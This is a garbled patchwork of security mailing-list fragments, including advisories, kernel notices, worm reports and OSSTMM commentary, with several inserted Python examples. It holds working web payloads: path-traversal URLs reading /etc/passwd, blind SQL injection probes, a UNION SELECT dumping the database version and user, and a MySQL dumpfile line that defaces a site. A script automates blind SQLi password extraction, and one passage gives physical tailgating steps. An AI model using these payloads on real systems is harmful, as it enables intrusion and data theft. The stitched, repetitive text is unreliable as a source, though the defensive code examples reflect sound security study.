To be fair, the security industry is trying really hard to get good
metrics, but proper metrics are also labor intensive and require counting
and other kinds of math beyond the average, disinterested, and
disillusioned security employee. Yes, just as measuring time requires
being able to read a clock, good metrics currently require being able to
read security and controls. Watch for more digital-watch equivalents in
2009. Unfortunately, like digital watches, they still don't assure that
people get there on time.
4. The vuln hunters are getting more and more afraid of the legal
instructive. Further information is available from the Windows Server
Group Policy Home
http://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.
To watch a demonstration of this policy being applied to a Windows Server 2003
domain controller, see the link below.
http://www.youtube.com/watch?v=XRVI4iQ2Nug
To watch a demonstration of this policy being applied to a Windows Server 2008
when it does hold, traffic can be measured. True - it is weaker than the
global attack, but still...
Alternatively, and assuming non-uniform (section-wise) traffic, the
attacker can start with "scanning" the sections (e.g. connect to port 1
of the attacker's IP, watch for traffic, then connect to port 2, watch
for traffic, etc.) - within a few thousand iterations (assuming
TABLE_LENGTH==1024), the section space will be almost completely
covered, and the attacker will have a good idea of where (i.e. in which
section(s)) the traffic is. Then the attacker only needs to monitor
those sections. This assumes that the traffic pattern is time-wise
select 'hello i dont like you' into dumpfile '/bla/not_my_friend/www/index.html';
-> considering too that his www or some other folder is not properly chmoded
...as also happens in many, many cases.]
PHP offers the possibility to interact with mysql and others.
I think safe_mode/open_basedir should totally watch what's going to mysql
(like those "into outfile/dumpfile"; "load_file" is different, for sure,
but considering the fact that they build/integrate a "safe mode" into PHP,
they should watch this kind of stuff.)
But once again .. I totally agree with your point; in a shared webhosting
~~~~~> http://[HOST]/[PATH]/admin/admin.php?skin=../../../../../boot.ini%00
~~~~~> http://[HOST]/[PATH]/admin/admin.php?skin=../../../etc/passwd%00
You can watch "Online Grades" exploits in action:
SQLi --> http://www.youtube.com/watch?v=PWYh5254I4c
Credentials Changer --> http://www.youtube.com/watch?v=BhHpLicPcC0
LFI/BSQLi --> http://www.youtube.com/watch?v=Mlpve19l6_o
LFI/BSQLi --> http://www.youtube.com/watch?v=6kt-NU98GXU
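The two `admin.php?skin=...%00` URLs above combine directory traversal with a trailing NUL byte: an include built as `$skin . ".php"` loses its suffix when the C string stops at the `%00`, so `../../../etc/passwd` is read instead of a skin file. As an added example, not code from the advisory or from the application, the following Python models that path construction beside a hardened resolver; the skin directory path, the `.php` suffix and the allow-list pattern are assumptions.

```python
import os
import re
from urllib.parse import parse_qs

# Assumed location of the application's skin files (not from the advisory).
SKIN_DIR = "/var/www/app/skins"

def skin_param(query_string):
    """Decode the skin= parameter the way the web server would, %00 included."""
    return parse_qs(query_string, keep_blank_values=True)["skin"][0]

def vulnerable_skin_path(skin):
    """Model of the vulnerable include: the suffix is appended, but the
    underlying C string ends at the first NUL, so the suffix (and any
    check that relies on it) is discarded by the file system call."""
    path = SKIN_DIR + "/" + skin + ".php"
    return path.split("\0", 1)[0]   # what open()/include actually sees

SKIN_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")

def safe_skin_path(skin):
    """Hardened resolver: reject NUL, allow-list the name, then confirm the
    canonical path still lies inside SKIN_DIR. Returns None on rejection."""
    if "\0" in skin or not SKIN_NAME.fullmatch(skin):
        return None
    base = os.path.realpath(SKIN_DIR)
    path = os.path.realpath(os.path.join(base, skin + ".php"))
    if os.path.commonpath([path, base]) != base:   # traversal escaped SKIN_DIR
        return None
    return path

if __name__ == "__main__":
    for qs in ("skin=default",
               "skin=../../../etc/passwd%00",
               "skin=../../../../../boot.ini%00"):
        p = skin_param(qs)
        print(repr(p), "->", vulnerable_skin_path(p), "| safe:", safe_skin_path(p))
```

The allow-list alone closes both URLs; the `realpath`/`commonpath` check is kept so that the resolver stays safe if the naming rule is later relaxed. Modern PHP rejects embedded NUL bytes in file system functions, which is why the `%00` trick only works against the old versions these advisories date from.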
Andy Davis wrote:
> Personally I think these techniques are pretty cool we're really pleased
> with the results of the research - I think it may be clearer to everyone
> when we release the higher resolution videos that are easier to watch.
I think it may be clearer to everyone if you release some kind of paper
describing (and including) the shellcodes. Also a fully commented
lpd-cisco-remote-shell exploit would help since it would *demonstrate* the
whole exploitation process :-) No offense, videos are nice but in the end they
are pure marketing, they *demonstrate* nothing.
OSSTMM soon gained the attention of governments from city to state to
national which is how it eventually got to the ISO. ISO is the acronym
of the International Standards Organization. Headquartered in Geneva,
Switzerland, ISO is the collection of people who create manuals
standardizing all sorts of things like paper sizes (ISO 216), what
determines a water-resistant watch (ISO 2281), how to properly conduct
quality management (ISO 9001), the C programming language (ISO 9899),
shoe sizes (ISO 9407), or what defines proper information security
(ISO 27001 and 27002). However they currently have nothing on
operational security, the means of assuring security for processes and
systems in action. The only way that can be done is by attacking it
software versions of the connected clients are copied into the
corresponding static buffers used for display in the GUI through the
wcscpy function.
If this string is too long, a crash occurs immediately or, in some
cases (BitTorrent for example), later, when the user views the status
of another torrent or leaves the "Peers" window.
Code execution is not possible.
To exploit the problem it is enough that an external attacker connects
to the random port opened on the client and sends the long client
Bugs to Flaws - Evgeny Lebanidze
* Preventing SQL Injections in Online Applications: Study, Recommendations
and Java Solution Prototype Based on the SQL DOM - Etienne Janot and
Pavol Zavarsky
* Watch What You Write: Preventing Cross-Site Scripting by Observing
Program Output - Matias Madou, Edward Lee, Jacob West and Brian Chess
New for AppSec Europe: there is an expo with technical vendor demos and a
Capture the Flag event!
I've probably missed some stuff (and got some stuff wrong), but this summary
became way too long already and it's late. Feedback welcome!
http://www.milw0rm.com/exploits/77
#
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE
#
#--------------
#WATCH VIDEOS
#--------------
#
# BSQLi --> http://www.youtube.com/watch?v=BYrkuAN2ggI
#
# LFI --> http://www.youtube.com/watch?v=LZ8cG_sIHow
It is obvious that benchmarking attacks can work against a huge number of programs that process data
in such ways. But will you ask all developers to master execution time, memory allocation and I/O
operations in order to hide sensitive and private data? No, that's nonsense.
The main problem is that a process can access another process's information just by watching its own
available environment. That is the major flaw: an unprivileged process grabbing data about a critical
process. A secured environment must be absolutely hermetic and must watch carefully what it
discloses to other users or processes. Windows clearly fails on that point, as does a badly protected
Linux when anyone can read the command line typed by a user just by running 'ps'.
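The 'ps' remark has a cheap concrete form: on a default Linux mount of /proc, every user can read every other user's /proc/<pid>/cmdline, so a password passed on a command line is readable by any local account. The following Python is an added example, not part of the original text: it scans argument vectors for arguments that carry a credential. The sample vectors are constructed, the patterns are illustrative rather than exhaustive, and the live variant is just a thin reader of /proc.

```python
import os
import re

# Constructed argument vectors standing in for what `ps` or /proc/<pid>/cmdline
# would show for other users' processes (not taken from the original page).
SAMPLE_CMDLINES = [
    ["mysql", "-u", "root", "-ps3cr3t", "shop"],
    ["curl", "-u", "alice:hunter2", "https://api.example.invalid/"],
    ["python3", "backup.py", "--password=Tr0ub4dor", "--dest", "/srv/backup"],
    ["sshd:", "alice", "[priv]"],
    ["vim", "notes.txt"],
]

# Illustrative patterns for a single argument that embeds a secret.
SECRET_PATTERNS = [
    re.compile(r"^-p(?!assword)\S+$"),                     # mysql-style -pPASSWORD
    re.compile(r"^--?(?:password|passwd|pass|token|secret|api[-_]?key)=\S+$", re.I),
]
# Options whose *next* argument is the secret.
VALUE_OPTIONS = {"--password", "--token", "--secret"}
USERPASS_OPTIONS = {"-u", "--user"}                        # curl-style user:pass

def secret_args(argv):
    """Return the sorted indexes of arguments in argv that carry a credential."""
    hits = set()
    for i, arg in enumerate(argv):
        if any(p.match(arg) for p in SECRET_PATTERNS):
            hits.add(i)
        if i > 0 and argv[i - 1].lower() in VALUE_OPTIONS:
            hits.add(i)
        if i > 0 and argv[i - 1] in USERPASS_OPTIONS and ":" in arg:
            hits.add(i)
    return sorted(hits)

def scan_cmdlines(cmdlines):
    """For every argv that leaks a credential, return (program, redacted argv)."""
    report = []
    for argv in cmdlines:
        hits = secret_args(argv)
        if hits:
            redacted = ["<redacted>" if i in hits else a for i, a in enumerate(argv)]
            report.append((argv[0], redacted))
    return report

def read_proc_cmdlines():
    """Live variant (Linux only): every /proc/<pid>/cmdline the caller may read.
    With the default mount that is every process on the box."""
    out = []
    if not os.path.isdir("/proc"):
        return out
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                raw = f.read()
        except OSError:          # process gone, or hidepid= in effect
            continue
        argv = [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]
        if argv:
            out.append(argv)
    return out

if __name__ == "__main__":
    for prog, redacted in scan_cmdlines(SAMPLE_CMDLINES + read_proc_cmdlines()):
        print(prog, " ".join(redacted))
```

Remounting /proc with `hidepid=2` hides other users' entries from `read_proc_cmdlines()` and from `ps`, but the durable fix is on the producing side: pass secrets through the environment, a file with restricted permissions, or stdin rather than argv, which is readable system-wide by design.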
Actually the library is divided into two branches: stable (3.8.3, released
back in 2003) and devel (the current CVS).
Although the vulnerable instructions are located in both versions,
only the devel branch is exploitable, because ID3v2 4.0 tags are not
supported in the stable one (see ID3V2_LATEST in globals.h).
#######################################################################
======
Description:
Previous versions of the kernel package contain multiple
vulnerabilities. The inotify functionality may allow local
users to gain privileges via unknown vectors related to race
conditions in inotify watch removal and umount. Additionally,
there are two denial-of-service vulnerabilities, including one
in which a local user may cause a "soft" system lock-up.
This update requires a system reboot to implement the fixes.
I have revised the paper based on the comments, and put the revised version on the Pomcor site, at
http://www.pomcor.com/whitepapers/file_sharing_security.pdf
(Watch for a revision date of November 10, there was an earlier version.)
The changes include an improvement based on the last post by Bil Corry (see Section 5.1).
Thanks for all the comments!
The "mailto" scheme is vulnerable when GroupWise is the default mail client: the handler for the scheme, when the scheme is followed by an overly long argument, causes a buffer overflow. As a consequence EIP can be overwritten and arbitrary code executed. This is what the debugger reveals:
Access violation when executing [41414141]
What makes the vulnerability powerful is that an HTML file containing an iframe with the malformed scheme triggers it merely by being viewed.
proof of concept
#!/usr/bin/python
Again my apologies if my asking this question in the wrong forum has
offended anyone.
And many thanks to anyone who responds.
byte modification removes access control to the VTY and the second
privilege escalates to Level 15.
Personally I think these techniques are pretty cool we're really pleased
with the results of the research - I think it may be clearer to everyone
when we release the higher resolution videos that are easier to watch.
Cheers,
Andy
#
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
#
#--------------
#WATCH VIDEOS
#--------------
#
# BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw
#
# AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0
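The probe pairs in this advisory (`Profile.php?id=[valid_id]%27+AND+1=0%23` -> FALSE, `1=1` -> TRUE) and in the earlier one against `song.php?hash=` are a boolean oracle: the page either renders the record or it does not. As an added example, not code from either advisory or either product, the Python below drives that oracle to completion against a constructed stand-in: an in-memory SQLite table and a string-built query in place of the PHP/MySQL page, with `-- ` as the comment terminator where the advisories use `%23` (`#` in MySQL). The table, its columns and the known-good value `admin` are assumptions; the parameterised page beside it shows why the same probe then fails.

```python
import sqlite3

def build_db():
    """Constructed stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
    conn.execute("INSERT INTO users VALUES (2, 'bob', 'hunter2')")
    return conn

def vulnerable_page(conn, value):
    """Model of song.php / Profile.php: the parameter is pasted into the query.
    Returns True when a record would be rendered, False otherwise."""
    sql = f"SELECT name FROM users WHERE name = '{value}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

def safe_page(conn, value):
    """Parameterised equivalent: the injected text is compared as data."""
    row = conn.execute("SELECT name FROM users WHERE name = ?", (value,)).fetchone()
    return row is not None

VALID = "admin"   # a known-good value, like the advisories' [valid_song] / [valid_id]

def is_injectable(conn, page=vulnerable_page):
    """The advisories' probe: ' AND 1=1 # -> TRUE and ' AND 1=0 # -> FALSE."""
    return page(conn, VALID + "' AND 1=1 -- ") and not page(conn, VALID + "' AND 1=0 -- ")

def ask(conn, condition):
    """One yes/no question to the oracle."""
    return vulnerable_page(conn, f"{VALID}' AND ({condition}) -- ")

def extract(conn, expr, max_len=64):
    """Recover the string value of SQL expression `expr` one character at a
    time, binary-searching each code point (about 8 requests per character).
    Assumes ASCII; raise the upper bound for other alphabets."""
    out = ""
    for pos in range(1, max_len + 1):
        if not ask(conn, f"length({expr}) >= {pos}"):
            break                                  # end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(conn, f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

if __name__ == "__main__":
    db = build_db()
    print("vulnerable page injectable:", is_injectable(db))
    print("parameterised page injectable:", is_injectable(db, safe_page))
    print("admin password:", extract(db, "(SELECT password FROM users WHERE name = 'admin')"))
```

Against MySQL the same loop works with `ascii(substring(...))` in place of `unicode(substr(...))` and `%23` as the terminator; the cost is the same, roughly eight requests per character, which is why a TRUE/FALSE pair like the one in the advisory is already a full information disclosure, not just a curiosity.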
Hugo Dias discovered that the ATM subsystem did not correctly manage
socket counts. A local attacker could exploit this to cause a system hang,
leading to a denial of service. (CVE-2008-5079)
It was discovered that the inotify subsystem contained watch removal
race conditions. A local attacker could exploit this to crash the system,
leading to a denial of service. (CVE-2008-5182)
Dann Frazier discovered that in certain situations sendmsg did not
correctly release allocated memory. A local attacker could exploit
> OSSTMM soon gained the attention of governments from city to state to
> national which is how it eventually got to the ISO. ISO is the acronym
> of the International Standards Organization. Headquartered in Geneva,
> Switzerland, ISO is the collection of people who create manuals
> standardizing all sorts of things like paper sizes (ISO 216), what
> determines a water-resistant watch (ISO 2281), how to properly conduct
> quality management (ISO 9001), the C programming language (ISO 9899),
> shoe sizes (ISO 9407), or what defines proper information security (ISO
> 27001 and 27002). However they currently have nothing on operational
> security, the means of assuring security for processes and systems in
> action. The only way that can be done is by attacking it every way
[++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23
-------------
WATCH VIDEO:
-------------
SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo
I am constantly updating on this on my twitter account to avoid
list clutter:
http://twitter.com/gadievron
You can watch the infection live on a web counter from the hosting
provider that the worm points to. This thing is fast-spreading.
Gadi.
==========
- WebLogic administrators can be trained not to browse other web pages
while logged in to the Administration Console. However, since some
hyperlinks in the console point to servers on the Internet (e.g.,
http://support.bea.com) the attacker could watch the administrator's
Internet traffic and detect such requests as a strong sign that the
administrator is currently logged in to the Administration Console. She
would then slightly modify the Internet server's response so as to include
the malicious code. Such an attack could only be mounted by attackers
capable of monitoring and modifying the administrator's Internet traffic
http://www.theage.com.au/news/technology/flaw-leaves-microsoft-looking-like-a-turkey/2007/11/23/1195975914416.html
Which is where Beau says there are ~160,000 exploitable machines in NZ alone.
He would *supposedly* know since he has the wpad.co.nz domain.
Whether it is a major issue or not, misconfigurations happen, heck, shit
happens. I'd think we should watch for this and get that domain
registered/monitored at different ccTLDs.
Gadi.
Exploitation
============
First identify the exit point that you want to exploit. Stand at a
safe distance during a high-traffic time and watch for people to use
the exit point. Time how long it takes for the door to close and
lock itself when someone traverses the exit point.
Next, identify a safe hiding place near the exit point, preferably
in a direction that would be behind a person exiting the door, but
On 10/12/07, Roman Medina-Heigl Hernandez wrote:
> Andy Davis wrote:
> > Personally I think these techniques are pretty cool we're really pleased
> > with the results of the research - I think it may be clearer to everyone
> > when we release the higher resolution videos that are easier to watch.
>
> I think it may be clearer to everyone if you release some kind of paper
> describing (and including) the shellcodes. Also a fully commented
> lpd-cisco-remote-shell exploit would help since it would *demonstrate* the
> whole exploitation process :-) No offense, videos are nice but in the end they
Just two:
1. You should know what you are talking about :)
2. You will need to submit a video recording of your entire talk before
the deadline. This will ensure that participants have something to watch
in case there is a last minute technical issue or some other problem.
These videos will be made available absolutely free to everyone a week
after the conference.
I spoke with DirectNIC last night and the Registrar Operations (reg-ops)
mailing list was updated that the domain is no longer reachable. That was
very fast response time from DirectNIC, which we appreciate.
The worm is still fast-spreading, watch the statistics as they fly:
http://www.d9.pl/system/stats.php
The facebook security team is working on this, and they are quite capable.
The security operations community has been doing analysis and
take-downs, but the worm seems to still be spreading.